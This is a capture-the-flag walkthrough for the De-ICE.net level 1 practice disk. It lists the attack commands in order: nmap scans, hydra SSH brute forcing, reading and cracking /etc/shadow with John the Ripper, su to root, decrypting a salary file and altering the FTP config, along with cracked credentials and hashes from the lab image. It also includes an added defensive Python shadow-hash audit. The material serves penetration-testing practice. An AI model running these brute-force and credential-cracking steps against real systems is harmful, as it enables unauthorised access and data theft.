De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

This is my walkthrough of how I broke into the De-ICE.net network, level 1, disk 1.

The De-ICE.net network is on a "live PenTest CD" that creates one or more targets on which to practise penetration testing; it has an "end goal" to reach.

Links

Download video: http://download.g0tmi1k.com/videos_archive/De-ICE_v1.0_(1.100).mp4

Tools

  • BackTrack 4 (Final)
  • de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
  • Dictionary(s)

Software

Name: De-ICE.net

Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)

Home Page: http://www.de-ice.net/ or hxxp://heorot.net/livecds/

Download Link: hxxp://heorot.net/instruction/tutorials/iso/de-ice.net-1.100-1.1.iso (new: http://hackingdojo.com/dojo-media/)

Forums/Support: hxxp://forums.heorot.net/ or hxxp://forums.heorot.net/viewtopic.php?f=16&t=13

WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.100
firefox 192.168.1.100
[ ]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
ssh bbanter@192.168.1.100
// Answer "yes" if asked about trusting the host's authenticity. Password: bbanter
cd /etc/
cat passwd
[ ]kate -> Update usernames. Save.
cat group
exit
cd /root/tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
ssh aadams@192.168.1.100
// Password: nostradamus
cd /etc/
sudo cat shadow
// Password: nostradamus
[ ]kate -> New -> Paste -> Save. Filename: shadow
exit
john
./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot
ssh aadams@192.168.1.100
// Password: nostradamus
su
// Password: tarot
ls -a
cd ..
ls -a
cd ftp
/
ls -a
cd incoming/
ls -a
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
cd /etc/
vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
modprobe capability
exit
exit
ftp 192.168.1.100
// User: root. Password: tarot
ls -a
cd ..
ls -a
cd home
ls -a
cd ftp
ls -a
cd incoming
ls -a
get salary.csv
cd /pentest/passwords/jtr
ls
mv salary.csv ~
[ ]kate -> salary.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:tarot           = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus   = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter      = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant   = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------
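
A defender-side check on the four shadow entries listed above, as an added example that is not part of the original post: it classifies each hash by its crypt(3) prefix and flags md5crypt (`$1$`) hashes together with accounts that have no maximum password age. The scheme table, the `WEAK` policy set and the function names are this example's own assumptions.

```python
# Added example (not from the original post): audit shadow(5) entries.
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
WEAK = {"md5crypt", "descrypt"}  # assumption: this audit's own policy

# The four entries listed in the Users block of this page.
SHADOW = """\
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
"""

def scheme_of(pw_field):
    """Classify the second shadow field by its crypt(3) prefix."""
    if pw_field == "":
        return "empty"
    if pw_field[0] in "!*":
        return "locked"
    if pw_field.startswith("$"):
        return SCHEMES.get(pw_field.split("$")[1], "unknown")
    return "descrypt"  # traditional DES crypt hashes carry no $ prefix

def audit(shadow_text):
    """Return {user: [findings]} for every account with at least one finding."""
    report = {}
    for lineno, line in enumerate(shadow_text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 9:
            raise ValueError(f"line {lineno}: expected 9 fields, got {len(fields)}")
        user, pw, max_days = fields[0], fields[1], fields[4]
        scheme = scheme_of(pw)
        findings = []
        if scheme == "empty":
            findings.append("no password set")
        elif scheme in WEAK or scheme == "unknown":
            findings.append(f"weak or unknown hash scheme: {scheme}")
        if scheme not in ("locked", "empty") and max_days in ("", "99999"):
            findings.append("password never expires")
        if findings:
            report[user] = findings
    return report

if __name__ == "__main__":
    for user, findings in audit(SHADOW).items():
        print(f"{user}: {'; '.join(findings)}")
```

All four accounts on this disk are reported with both findings; an entry hashed with `$6$` and a finite maximum age, or a locked account, produces none.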

Notes

Song: Aly & Fila - Khepera

Video length: 04:11

Capture length: 08:52

Blog Post: https://blog.g0tmi1k.com/2010/02/de-icenet-v10-1100-level-1-disk-1/